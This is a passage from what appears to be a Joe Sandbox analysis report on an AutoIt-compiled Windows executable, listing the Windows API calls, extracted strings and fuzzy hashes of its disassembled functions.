                                                                        • GetDlgCtrlID.USER32(?), ref: 0092D15F
                                                                        • GetWindowRect.USER32(?,?), ref: 0092D195
                                                                        • GetParent.USER32(?), ref: 0092D1B3
                                                                        • ScreenToClient.USER32(00000000), ref: 0092D1BA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0092D234
                                                                        • _wcscmp.LIBCMT ref: 0092D248
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0092D26E
                                                                        • _wcscmp.LIBCMT ref: 0092D282
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                        • String ID: %s%u
                                                                        • API String ID: 3119225716-679674701
                                                                        • Opcode ID: db58d7cf331084133f4b2249dd91ab7f41e1b8f414e2f8fe4f72509be025f2ca
                                                                        • Instruction ID: 660e1cdcaaa0481be5448c64604f9b54cfd830df2ed5953c9cc1b98772026e0a
                                                                        • Opcode Fuzzy Hash: db58d7cf331084133f4b2249dd91ab7f41e1b8f414e2f8fe4f72509be025f2ca
                                                                        • Instruction Fuzzy Hash: F5A1F071209316EFD708DF64E884BEAB7ACFF44310F008519FAA9D2195DB30EA55CB91
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0092D8EB
                                                                        • _wcscmp.LIBCMT ref: 0092D8FC
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0092D924
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0092D941
                                                                        • _wcscmp.LIBCMT ref: 0092D95F
                                                                        • _wcsstr.LIBCMT ref: 0092D970
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0092D9A8
                                                                        • _wcscmp.LIBCMT ref: 0092D9B8
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0092D9DF
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0092DA28
                                                                        • _wcscmp.LIBCMT ref: 0092DA38
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0092DA60
                                                                        • GetWindowRect.USER32(00000004,?), ref: 0092DAC9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: b085b6b4bc2c31a59b62fdbf7fec42d5fd7886544ea20c4eeed5c80a899b51ba
                                                                        • Instruction ID: f184f3e565db3f0e08c1e2ca4c0aaed17108311c5a609b24e8658c5685f0af37
                                                                        • Opcode Fuzzy Hash: b085b6b4bc2c31a59b62fdbf7fec42d5fd7886544ea20c4eeed5c80a899b51ba
                                                                        • Instruction Fuzzy Hash: 2681C33110A3199BDB01DF14E985FAA7BECFF84314F044469FD899A09ADB30DD85CBA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: 1cabb711630f031d45f0a756bdca93b30cb6b881bcb86d4d060fcac1f5a4faac
                                                                        • Instruction ID: 9e0e3b0e3763a4a1ff11b119f4a779c1de548e76272f1557691f86c415f0a548
                                                                        • Opcode Fuzzy Hash: 1cabb711630f031d45f0a756bdca93b30cb6b881bcb86d4d060fcac1f5a4faac
                                                                        • Instruction Fuzzy Hash: C631C031A4421CA6DB14EB68ED43FEDB3B8AF62314F200168F641B10D5FB51AB4486A2
                                                                        APIs
                                                                        • LoadIconW.USER32(00000063), ref: 0092EAB0
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0092EAC2
                                                                        • SetWindowTextW.USER32(?,?), ref: 0092EAD9
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0092EAEE
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0092EAF4
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0092EB04
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0092EB0A
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0092EB2B
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0092EB45
                                                                        • GetWindowRect.USER32(?,?), ref: 0092EB4E
                                                                        • SetWindowTextW.USER32(?,?), ref: 0092EBB9
                                                                        • GetDesktopWindow.USER32 ref: 0092EBBF
                                                                        • GetWindowRect.USER32(00000000), ref: 0092EBC6
                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0092EC12
                                                                        • GetClientRect.USER32(?,?), ref: 0092EC1F
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0092EC44
                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0092EC6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: efadf5c58600f0ba840cfc3b4e4d240331edde04ef480f1d8f590631f4681932
                                                                        • Instruction ID: 89ab5ed003bbe550034ba29cb350e08a78b03129740407ba367358df001f527c
                                                                        • Opcode Fuzzy Hash: efadf5c58600f0ba840cfc3b4e4d240331edde04ef480f1d8f590631f4681932
                                                                        • Instruction Fuzzy Hash: 29517A71900709AFDB20DFA9DD89F6EBBF9FF44705F004928E686A26A4C774A944DB10
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 009479C6
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 009479D1
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 009479DC
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 009479E7
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 009479F2
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 009479FD
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00947A08
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00947A13
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00947A1E
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00947A29
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00947A34
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00947A3F
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00947A4A
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00947A55
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00947A60
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00947A6B
                                                                        • GetCursorInfo.USER32(?), ref: 00947A7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$Info
                                                                        • String ID:
                                                                        • API String ID: 2577412497-0
                                                                        • Opcode ID: 7e8f8f5c77c6122b6cb99b2be077c694f2e9953183033c482937893275054f05
                                                                        • Instruction ID: a27033d6e77cf7ed65967620702b318f6d17f1fb09873ea4b8ff7a77be0ba4c5
                                                                        • Opcode Fuzzy Hash: 7e8f8f5c77c6122b6cb99b2be077c694f2e9953183033c482937893275054f05
                                                                        • Instruction Fuzzy Hash: FF31E1B1D4831E6ADB109FB68C8995FFEE8FF04750F50492AA50DA7280DB78A5008FA1
                                                                        APIs
                                                                          • Part of subcall function 0090E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008FC8B7,?,00002000,?,?,00000000,?,008F419E,?,?,?,0098DC00), ref: 0090E984
                                                                          • Part of subcall function 008F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F53B1,?,?,008F61FF,?,00000000,00000001,00000000), ref: 008F662F
                                                                        • __wsplitpath.LIBCMT ref: 008FC93E
                                                                          • Part of subcall function 00911DFC: __wsplitpath_helper.LIBCMT ref: 00911E3C
                                                                        • _wcscpy.LIBCMT ref: 008FC953
                                                                        • _wcscat.LIBCMT ref: 008FC968
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008FC978
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FCABE
                                                                          • Part of subcall function 008FB337: _wcscpy.LIBCMT ref: 008FB36F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 2258743419-1018226102
                                                                        • Opcode ID: 75a4df2bc06d361c226b528a8eac92d0c6c20ee72d06fde894e0269f550a301a
                                                                        • Instruction ID: 074286e63a1e1e7d72aa87d855a82329ae1be90c4eda668cae055d7fa29a83ba
                                                                        • Opcode Fuzzy Hash: 75a4df2bc06d361c226b528a8eac92d0c6c20ee72d06fde894e0269f550a301a
                                                                        • Instruction Fuzzy Hash: 261278715083499FC724EF28C991AAFBBE4FFC9314F40491EF589932A1DB309A49CB52
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0095CEFB
                                                                        • DestroyWindow.USER32(?,?), ref: 0095CF73
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0095CFF4
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0095D016
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095D025
                                                                        • DestroyWindow.USER32(?), ref: 0095D042
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008F0000,00000000), ref: 0095D075
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095D094
                                                                        • GetDesktopWindow.USER32 ref: 0095D0A9
                                                                        • GetWindowRect.USER32(00000000), ref: 0095D0B0
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0095D0C2
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0095D0DA
                                                                          • Part of subcall function 0090B526: GetWindowLongW.USER32(?,000000EB), ref: 0090B537
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 3877571568-3619404913
                                                                        • Opcode ID: 42f3b0355876ffadc1419f834b4727ba8d61116efa00652526ea6636a7e79604
                                                                        • Instruction ID: 1bc57289274606eed8da6f433550d1e33559632e197170983bc131d53cf620c6
                                                                        • Opcode Fuzzy Hash: 42f3b0355876ffadc1419f834b4727ba8d61116efa00652526ea6636a7e79604
                                                                        • Instruction Fuzzy Hash: D471DCB1255305AFDB20CF28CC84FA637E9EB88704F54461DFD858B2A1D770E846DB62
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0095F37A
                                                                          • Part of subcall function 0095D7DE: ClientToScreen.USER32(?,?), ref: 0095D807
                                                                          • Part of subcall function 0095D7DE: GetWindowRect.USER32(?,?), ref: 0095D87D
                                                                          • Part of subcall function 0095D7DE: PtInRect.USER32(?,?,0095ED5A), ref: 0095D88D
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0095F3E3
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0095F3EE
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0095F411
                                                                        • _wcscat.LIBCMT ref: 0095F441
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0095F458
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0095F471
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0095F488
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0095F4AA
                                                                        • DragFinish.SHELL32(?), ref: 0095F4B1
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0095F59C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: ed716304a2eb3b4045577e732548e195d2e3b3c0c106b40da75a154ac8ed4dcc
                                                                        • Instruction ID: 866b8d756e3cf8af2e45b9aae71109dee0324dc8a0c15087df45d6fef83d354a
                                                                        • Opcode Fuzzy Hash: ed716304a2eb3b4045577e732548e195d2e3b3c0c106b40da75a154ac8ed4dcc
                                                                        • Instruction Fuzzy Hash: 3A612A72108304AFC711EF64CC49EABBBF8FFC9724F400A1EB695921A1DB709649CB52
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0093AB3D
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0093AB46
                                                                        • VariantClear.OLEAUT32(?), ref: 0093AB52
                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0093AC40
                                                                        • __swprintf.LIBCMT ref: 0093AC70
                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0093AC9C
                                                                        • VariantInit.OLEAUT32(?), ref: 0093AD4D
                                                                        • SysFreeString.OLEAUT32(00000016), ref: 0093ADDF
                                                                        • VariantClear.OLEAUT32(?), ref: 0093AE35
                                                                        • VariantClear.OLEAUT32(?), ref: 0093AE44
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0093AE80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 3730832054-3931177956
                                                                        • Opcode ID: 3598726d08494362048e89aea3fec1d9b3479d2fba72232798db06134376e387
                                                                        • Instruction ID: 86229e970c67c1c0177a3244192af6284b8b7406a13c6239be116d4b5f4e15e3
                                                                        • Opcode Fuzzy Hash: 3598726d08494362048e89aea3fec1d9b3479d2fba72232798db06134376e387
                                                                        • Instruction Fuzzy Hash: 8BD1EE71A04219EFDB20AF65C885B6AF7B9FF44700F148855E4859B1E0DB78ED80DFA2
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 009571FC
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00957247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: 9b595a5528c8a5cb3ba774b2aabc046b4160645439895f4eb5da64b866f512a4
                                                                        • Instruction ID: a40acaf21f2e5e7f1846633d229608698a64010930c6f32155270b5ca337fce4
                                                                        • Opcode Fuzzy Hash: 9b595a5528c8a5cb3ba774b2aabc046b4160645439895f4eb5da64b866f512a4
                                                                        • Instruction Fuzzy Hash: 3D914C742087119FCB04EF65D441A6EB7A6BF94310F00485CFD966B3A2DB75EE0ACB82
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0095E5AB
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0095BEAF), ref: 0095E607
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095E647
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095E68C
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0095E6C3
                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0095BEAF), ref: 0095E6CF
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095E6DF
                                                                        • DestroyIcon.USER32(?,?,?,?,?,0095BEAF), ref: 0095E6EE
                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0095E70B
                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0095E717
                                                                          • Part of subcall function 00910FA7: __wcsicmp_l.LIBCMT ref: 00911030
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 1212759294-1154884017
                                                                        • Opcode ID: c8f2ee0debf647474c020701549f3577baa27cb3ce3c17489c07d4e6f72ea779
                                                                        • Instruction ID: a83c3a57322541880b775ccd6b674a85d573776110ed8ec185e369b6486c3dce
                                                                        • Opcode Fuzzy Hash: c8f2ee0debf647474c020701549f3577baa27cb3ce3c17489c07d4e6f72ea779
                                                                        • Instruction Fuzzy Hash: D361EF71600219BAEB18DF65CC46FFE77ACBF08765F104105F915E61D0EBB2AA84CBA0
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0093D292
                                                                        • GetDriveTypeW.KERNEL32 ref: 0093D2DF
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093D327
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093D35E
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0093D38C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1148790751-4113822522
                                                                        • Opcode ID: 855107963270a60cf35cd21daac07c9c2b2699008c8f233cf4cf975b15ca3804
                                                                        • Instruction ID: 38f67ab5e66513473356c5b76c7eee9172bda66358013716d3f650bc326b9c0b
                                                                        • Opcode Fuzzy Hash: 855107963270a60cf35cd21daac07c9c2b2699008c8f233cf4cf975b15ca3804
                                                                        • Instruction Fuzzy Hash: 49515C715043189FC700EF24D99196AB3F8FF88718F00885CF995A7291DB31EE05CB82
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00963973,00000016,0000138C,00000016,?,00000016,0098DDB4,00000000,?), ref: 009326F1
                                                                        • LoadStringW.USER32(00000000,?,00963973,00000016), ref: 009326FA
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00963973,00000016,0000138C,00000016,?,00000016,0098DDB4,00000000,?,00000016), ref: 0093271C
                                                                        • LoadStringW.USER32(00000000,?,00963973,00000016), ref: 0093271F
                                                                        • __swprintf.LIBCMT ref: 0093276F
                                                                        • __swprintf.LIBCMT ref: 00932780
                                                                        • _wprintf.LIBCMT ref: 00932829
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00932840
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
